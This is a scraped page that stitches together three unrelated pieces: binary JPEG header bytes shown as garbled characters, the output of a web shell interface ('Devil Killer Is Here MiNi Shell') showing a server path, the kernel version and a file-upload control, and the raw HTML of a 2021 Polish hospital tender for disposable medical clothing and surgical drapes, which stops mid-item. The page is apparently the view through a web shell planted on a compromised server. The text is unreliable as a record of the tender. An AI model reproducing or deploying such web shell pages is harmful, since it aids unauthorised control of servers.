JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210701/0010177002-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00101770 z dnia 2021-07-01</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy odzieży medycznej i obłożeń medycznych jednorazowych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Leczenia Oparzeń im. dr. Stanisława Sakiela w Siemianowicach Śląskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272165010</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@clo.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.clo.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy odzieży medycznej i obłożeń medycznych jednorazowych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6e6d2b24-da57-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00101770</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000319/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.14 Odzież medyczna i obłożenia medyczne jednorazowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.clo.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ , ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej. <br/>2.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>3.	Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert): <br/>a)	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem sprawy <br/>b)	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email przetargi@clo.com.pl <br/>c)	Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 3 lit. b adres email. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415). <br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. <br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularza do komunikacji” wynosi 150 MB. <br/>6. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>7.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną część należy ten plik zaszyfrować.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CLO/ZP/18/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">13</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 1 Odzież medyczna jednorazowa:<br/>1.	Fartuch izolacyjny do pracy przy pacjencie, niesterylny, barierowy - odporny na przenikanie wody, wykonany z włókniny SMS lub SMMMS o gramaturze min. 25g/m2, rękawy zakończone na gumki lub mankiet. Wiązania w pasie, przy szyi przylepiec/rzep lub troki.<br/>Rozmiar L.<br/>Ilość: 12 000 sztuk.<br/>2.	Fartuch izolacyjny do pracy przy pacjencie, niesterylny, barierowy - odporny na przenikanie wody, wykonany z włókniny SMS lub SMMMS o gramaturze min. 25g/m2, rękawy zakończone na gumki lub mankiet. Wiązania w pasie, przy szyi przylepiec/rzep lub troki.<br/>Rozmiar XL. Obwód na dole fartucha dla rozmiaru XL - min. 150 cm.<br/>Ilość: 20 000 sztuk.<br/>3.	Fartuch medyczny pełnobarierowy, niejałowy, podfoliowany, wykonany z włókniny polipropylen i polietylenu, o gramaturze łącznej 30-35 g/m2. Rękawy zakończone elastyczną gumką lub mankietem, wiązany z tyłu na troki (przy szyi dopuszczalny rzep), krój prosty, rozmiar L/XL. <br/>Ilość: 5 000 sztuk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33199000-1 - Odzież medyczna</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33140000-3 - Materiały medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 2:<br/>Uniwersalny jałowy zestaw do zabiegu operacyjnego wzmocniony z fartuchami wzmocnionymi w składzie: <br/>1)	1 x serweta na stolik narzędziowy 135 x 185 cm (+/- 10 cm);<br/>2)	1 x serweta na stolik Mayo 80 x 140 cm (+/- 5 cm);<br/>3)	2 x przylepna serweta 90 x 80cm (+/-5 cm) ze wzmocnieniem 60 x 30 cm (+/- 5 cm);<br/>4)	1 x przylepna serweta 240 x 150 cm (+/- 5 cm) ze wzmocnieniem 65 x 25 cm (+/- 5 cm) ze zintegrowanym podwójnym uchwytem na przewody; <br/>5)	1 x przylepna serweta 175 x 200 cm (+/- 5 cm) ze wzmocnieniem 65 x 30 cm (+/- 5 cm) ze zintegrowanym podwójnym uchwytem na przewody; <br/>6)	1 x taśma lepna 9 x 50 cm (+/- 2 cm);<br/>7)	1 x uchwyt na przewody typu rzep 14 x 2,5 cm (+/- 1 cm);<br/>8)	2 x ręcznik chłonny jednorazowy 25 x 35 cm (+/- 5 cm);<br/>9)	3 x fartuch chirurgiczny z włókniny SMMMS o gramaturze min. 30 g/m2, wzmocniony w przedniej części i na rękawach, gramatura w miejscu wzmocnienia min. 90 g/m2. Rękawy zakończone elastycznym mankietem, krój prosty, rozmiary: 1x L i 2x XL. Fartuchy zapakowane dodatkowo we włókninę i umieszczone na wierzchu pierwszej warstwy opakowania (na serwecie na stolik narzędziowy, w którą owinięte są pozostałe elementy zestawu).<br/>Serwety okrywające pacjenta, wykonane z chłonnego na całej powierzchni bilaminatu o gramaturze max. 60 g/m2 i odporności na przenikanie płynów minimum 45 cm H₂O, w obszarze krytycznym gramatura minimum 80 g/m2 a odporność na przenikanie płynów > 170 cm H2O. Wzmocnienie chłonne w obszarze krytycznym bez celulozy i wiskozy.<br/>Produkt pierwszej klasy palności, oznakowany jako wyrób medyczny.<br/>Opakowanie zabezpieczające przed przypadkowym uszkodzeniem, na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierające min. numer serii (LOT) i datę ważności.<br/>Produkt sterylizowany zgodnie z normami wymaganymi prawem.<br/>Ilość: 100 zestawów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 3:<br/>Jałowy zestaw (komplet) do operacji głowy / szyi.<br/>Minimalny skład:<br/>1)	serweta chirurgiczna do okrycia głowy o wymiarach 100-110 cm x 145-155 cm, z owinięciem w formie turbanu, wyposażona w taśmy samoprzylepne. Serweta wykonana z min. dwuwarstwowego laminatu lub miękkiej włókniny wiskozowo-poliestrowej, odporność na przenikanie cieczy na całej powierzchni serwety min. 100 cm H2O – 1 sztuka;<br/>2)	serweta chirurgiczna dolna o wymiarach 195-205 cm x 285-295 cm z samoprzylepnym wycięciem U o wymiarach 6-8 cm x 63-66 cm. Zintegrowane organizatory przewodów. Serweta wykonana z laminatu min. dwuwarstwowego o gramaturze min. 60g/m2, odporność na przenikanie cieczy na całej powierzchni serwet min. 200 cm H2O – 1 sztuka; <br/>3)	osłona na stolik MAYO 75-85 cm x 140-150 cm – 1 sztuka;<br/>4)	serweta na stolik – (owinięcie zestawu) wymiary 140-150 cm x 190-210 cm.<br/>Produkt pierwszej klasy palności, oznakowany jako wyrób medyczny.<br/>Opakowanie zabezpieczające przed przypadkowym uszkodzeniem, na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierające min. numer serii (LOT) i datę ważności.<br/>Produkt sterylizowany zgodnie z normami wymaganymi prawem.<br/>Ilość: 300 kompletów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 4 Odzież medyczna jednorazowa:<br/>1.	Komplet (zestaw):<br/>1)	Fartuch chirurgiczny jałowy wykonany z włókniny SMMMS lub SMMS o gramaturze minimum 30 g/m2. Dodatkowe wzmocnienie co najmniej na części przedniej i rękawach z „oddychającego” laminatu. Gramatura w miejscu wzmocnienia na przedniej części i rękawach min. 70 g/m2. <br/>Repelencja (odporność na zwilżanie) dla alkoholi i wody. <br/>Rękawy typu ryglan, zakończone elastycznym mankietem.<br/>Fartuch z tyłu zapinany na rzep. Fartuch musi posiadać troki do związania.<br/>Dostępny w rozmiarach S–XXL/2XLL. <br/>2)	2 jednorazowe ręczniki.<br/>Opakowanie zewnętrzne zabezpieczające przed przypadkowym uszkodzeniem, np. torebka papierowo-foliowa; na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierające min.: nr lot, datę ważności.<br/>Wyrób medyczny.<br/>Ilość: 3 000 kompletów.<br/>2.	Komplet (zestaw) chirurgiczny jednorazowy z włókniny składający się z bluzy zakładanej przez głowę oraz spodni – wykonany z antystatycznej miękkiej włókniny SMS o gramaturze min. 35 g/m2 z wycięciem w kształcie V pod szyją. <br/>Minimum 2 kieszenie. <br/>Rękaw krótki, prosty. Spodnie ściągane w pasie trokami lub gumką, nogawki bez ściągaczy.<br/>Dostępne rozmiary: S, M, L, XL, XXL. <br/>Ilość: 1 500 kompletów.<br/>Produkty objęte Pakietem 4 poz. 1 muszą być wyrobami medycznymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33199000-1 - Odzież medyczna</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 5 Obłożenia medyczne:<br/>1.	Serweta operacyjna sterylna dwuczęściowa z regulowanym otworem i przylepcem, dwuwarstwowa (pierwsza warstwa – włóknina polipropylenowa, druga warstwa – folia) o gramaturze nie mniejszej niż 50 g/m2 na całej powierzchni serwety, w rozmiarze 75-85 cm x 40-50 cm.<br/>Pakowana pojedynczo.<br/>Opakowanie zabezpieczające przed przypadkowym uszkodzeniem; na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierające min.: nr lot, datę ważności.<br/>Wyrób medyczny.<br/>Ilość: 1 500 sztuk. <br/>2.	Serweta operacyjna sterylna dwuczęściowa z regulowanym otworem i przylepcem, dwuwarstwowa (pierwsza warstwa – włóknina polipropylenowa, druga warstwa – folia) o gramaturze nie mniejszej niż 50 g/m2 na całej powierzchni serwety, w rozmiarze 145-165 cm x 90-110 cm.<br/>Pakowana 